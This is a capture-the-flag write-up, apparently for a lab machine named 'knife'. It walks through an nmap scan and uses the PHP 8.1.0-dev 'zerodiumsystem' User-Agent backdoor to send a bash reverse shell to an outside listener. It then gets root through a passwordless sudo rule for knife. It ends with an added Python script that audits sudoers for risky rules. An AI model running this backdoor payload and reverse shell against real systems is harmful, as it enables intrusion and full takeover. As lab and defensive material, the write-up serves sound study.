Scanning with nmap

```text
sudo nmap --min-rate 10000 -sS -Pn -sV 10.129.211.145
Nmap scan report for 10.129.211.145
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds
```
Ports 22 and 80 are open. Browsing to port 80, the PHP version is visible in the response headers:

```http
HTTP/1.1 200 OK
Date: Sat, 13 Apr 2024 10:07:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8
```
This version contains the backdoor, so RCE is possible directly. Bounce a shell straight back to the local machine:

```http
User-Agentt:zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.4/8888 0>&1'");
```

Obtain the flag from user.txt:

```text
james@knife:~$ cat user.txt
cat user.txt
8f76f62dae4f23ad7c61094fff67a86d
```
Continue with privilege escalation. Run `sudo -l` to check the permissions of the james user:

```text
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
```
The /usr/bin/knife command can be run as root without a password. First use python to get an interactive shell:

```shell
python3 -c "__import__('pty').spawn('/bin/bash')"
```

Then use knife to escalate privileges:

```shell
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
```
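As an added defender-side example (not part of the original writeup), the script below parses `sudo -l` output like the block above and flags root-level entries that point to an interpreter-like binary such as knife, or to ALL, so that an administrator can audit sudoers for rules that amount to a root shell. The SHELL_CAPABLE list and the extra sample entries besides the knife rule are assumptions constructed for illustration.

```python
import re

# Constructed sample of `sudo -l` output; the knife entry mirrors the one on this page,
# the other two entries are added to show a safe rule and a catch-all rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/apt-get
    (ALL : ALL) NOPASSWD: ALL
"""

# Illustrative (assumed) list of binaries whose normal interface can run arbitrary
# code or spawn a shell; `knife exec` is the case demonstrated on this page.
SHELL_CAPABLE = {"knife", "python3", "perl", "vim", "find", "bash", "sh"}

# One sudoers entry: "(runas) TAG: TAG: command [args]"
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Return the command entries listed after the 'User X may run' line."""
    entries = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True  # everything after this header is a rule
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, cmd = m.groups()
        tagset = {t.strip(":") for t in tags.split()}
        entries.append({"runas": runas.strip(),
                        "nopasswd": "NOPASSWD" in tagset,
                        "command": cmd})
    return entries


def risky_entries(entries):
    """Entries that run as root (or ALL) and allow ALL or a shell-capable binary."""
    out = []
    for e in entries:
        runas_user = e["runas"].split(":")[0].strip()
        binary = e["command"].split()[0]          # ignore any fixed arguments
        name = binary.rsplit("/", 1)[-1]           # basename of the binary
        if runas_user in ("root", "ALL") and (binary == "ALL" or name in SHELL_CAPABLE):
            out.append(e)
    return out
```

Run `risky_entries(parse_sudo_l(open("sudo_l.txt").read()))` over real output to list the rules worth reviewing; a NOPASSWD rule for a shell-capable binary is effectively a passwordless root login.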